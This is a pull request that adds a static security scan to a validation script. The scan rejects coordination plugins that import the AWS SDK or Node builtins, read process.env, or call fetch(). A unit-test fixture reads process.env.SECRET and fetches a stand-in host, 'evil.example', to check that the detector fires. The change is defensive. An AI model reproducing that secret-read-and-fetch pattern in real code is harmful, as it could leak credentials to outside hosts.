### PR TITLE
feat(validate-problems): enforce coordination plugin pure-reducer rule (ADR-030 S1) [#1420]

### DIFF
--- a/infrastructure/test/scripts/validate-problems-cross-ref.test.ts
+++ b/infrastructure/test/scripts/validate-problems-cross-ref.test.ts
@@ -1,6 +1,8 @@
 import { execSync } from "node:child_process";
+import { mkdirSync, mkdtempSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
 import { join } from "node:path";
-import { describe, expect, it } from "vitest";
+import { afterEach, beforeEach, describe, expect, it } from "vitest";
 import { checkCoordinationPluginFile } from "../../../scripts/validate-problems";
 
 /**
@@ -71,5 +73,53 @@ describe("checkCoordinationPluginFile (#1420)", () => {
 
   it("should be a no-op when plugin is not a string", () => {
     expect(checkCoordinationPluginFile({ interTeamCoordination: {} }, MS_DIR)).toEqual([]);
+  });
+});
+
+describe("checkCoordinationPluginFile content scan (ADR-030 S1 #1420)", () => {
+  let dir: string;
+  beforeEach(() => {
+    dir = mkdtempSync(join(tmpdir(), "coord-plugin-"));
+    mkdirSync(join(dir, "coordination"), { recursive: true });
+  });
+  afterEach(() => rmSync(dir, { recursive: true, force: true }));
+
+  function writePlugin(content: string): Record<string, unknown> {
+    writeFileSync(join(dir, "coordination", "p.ts"), content);
+    return { interTeamCoordination: { plugin: "coordination/p.ts" } };
+  }
+
+  it("should pass a side-effect-free pure reducer", () => {
+    const meta = writePlugin(
+      'import { defineCoordinationPlugin } from "@tenkacloud/coordination-plugin-sdk";\n' +
+        "export default defineCoordinationPlugin({ initialState: () => ({}), " +
+        "validateOp: () => ({ ok: true }), applyOp: (s) => s, projectForTeam: (s) => s });\n",
+    );
+    expect(checkCoordinationPluginFile(meta, dir)).toEqual([]);
+  });
+
+  it("should reject an @aws-sdk import (credential reach)", () => {
+    const errs = checkCoordinationPluginFile(
+      writePlugin('import { S3Client } from "@aws-sdk/client-s3";\n'),
+      dir,
+    );
+    expect(errs).toHaveLength(1);
+    expect(errs[0]).toContain("@aws-sdk import");
+  });
+
+  it("should reject node: builtins, process.env, and fetch()", () => {
+    const errs = checkCoordinationPluginFile(
+      writePlugin(
+        'import { readFileSync } from "node:fs";\n' +
+          "const s = process.env.SECRET;\n" +
+          'await fetch("https://evil.example");\n',
+      ),
+      dir,
+    );
+    const joined = errs.join(" | ");
+    expect(joined).toContain("node: builtin import");
+    expect(joined).toContain("process.env access");
+    expect(joined).toContain("fetch() call");
+    expect(errs).toHaveLength(3);
   });
 });

--- a/scripts/validate-problems.ts
+++ b/scripts/validate-problems.ts
@@ -253,14 +253,37 @@ function checkDashboardSlotFiles(meta: Metadata, dir: string): ValidationError[]
  * 出題者は気付けない。 SCHEMA は path pattern までしか保証しないので file 実在はここで止める。
  * interTeamCoordination 未宣言の problem は無影響 (= 早期 return)。
  */
+/**
+ * ADR-030 S1/S3 (#1420): coordination plugin は **副作用なしの純 reducer** でなければならない。
+ * platform の (最小 IAM とはいえ) dispatcher Lambda が in-process で動的 import するため、 AWS SDK /
+ * fetch / node 組み込み / 環境変数アクセスを含む plugin は資格情報・外部 I/O への足がかりになりうる。
+ * S1 の「reviewer checklist (import 監査)」を機械チェック化し、 これらを宣言した plugin は出題時に reject する。
+ */
+const COORDINATION_FORBIDDEN_PATTERNS: ReadonlyArray<{
+  readonly label: string;
+  readonly re: RegExp;
+}> = [
+  { label: "@aws-sdk import", re: /@aws-sdk\// },
+  { label: "node: builtin import", re: /["']node:/ },
+  { label: "process.env access", re: /process\s*\.\s*env/ },
+  { label: "fetch() call", re: /\bfetch\s*\(/ },
+];
+
 export function checkCoordinationPluginFile(meta: Metadata, dir: string): ValidationError[] {
   const coordination = meta.interTeamCoordination as Record<string, unknown> | undefined;
   const plugin = coordination?.plugin;
   if (typeof plugin !== "string") return [];
-  if (!existsSync(join(dir, plugin))) {
+  const pluginPath = join(dir, plugin);
+  if (!existsSync(pluginPath)) {
     return [`interTeamCoordination.plugin="${plugin}" file not found`];
   }
-  return [];
+  // ADR-030 S1: pure-reducer 規約を機械 enforce (= dispatcher が in-process 実行するため、
+  // 未信頼コードが資格情報・外部 I/O に到達する import を出題時に弾く)。
+  const source = readFileSync(pluginPath, "utf8");
+  return COORDINATION_FORBIDDEN_PATTERNS.filter(({ re }) => re.test(source)).map(
+    ({ label }) =>
+      `interTeamCoordination.plugin="${plugin}" must be a side-effect-free pure reducer (ADR-030 S1): forbidden ${label}`,
+  );
 }
 
 function main(): void {


### PR DESCRIPTION
## Summary

ADR-030 **S1**(「reviewer checklist = import 監査」)を**機械チェック化**する。 coordination plugin は platform の dispatcher Lambda が in-process で動的 import するため、副作用なしの純 reducer でなければならない (ADR-030 S1/S3)。 既存の plugin-file 実在 cross-ref に加え、plugin 本体を静的スキャンして以下を含む宣言を**出題時に reject**:

- `@aws-sdk/*` import(競技者資格情報・cross-tenant データ到達）
- `node:*` builtin import（OS / FS アクセス）
- `process.env` アクセス（環境変数 exfil）
- `fetch(` 呼び出し（外部送信）

ADR-030 の三層防御（S1 レビュー / S2 最小 IAM / S3 純 reducer 契約）のうち **S1 を人手 checklist → machine-enforced** に引き上げる。 PR #1633 の S2(最小 IAM dispatcher)とは独立に効く **authoring-time gate**。

## Test plan
- 既存 reference 問題 (`microservice-migration-battle/coordination/router.ts`) は純 reducer ゆえ pass（確認済み）
- content scan の positive(pure reducer pass)/ negative(@aws-sdk / node: / process.env / fetch を reject)を temp fixture で unit test
- `make validate-problems` / scripts test 全 **183 green** / harness(error 0)/ tsc / biome pass

## Regression analysis
- `checkCoordinationPluginFile` を「file 実在 + 内容スキャン」に拡張。 `interTeamCoordination` 未宣言問題は no-op。 既存 cross-ref test 不変。

## Physical impact
- **NO-OP** on CFn / deployed artifacts。 authoring-time の validation script 拡張のみ（`make validate-problems` / CI gate で動作）。

Relates #1420
Relates #1417

🤖 Generated with [Claude Code](https://claude.com/claude-code)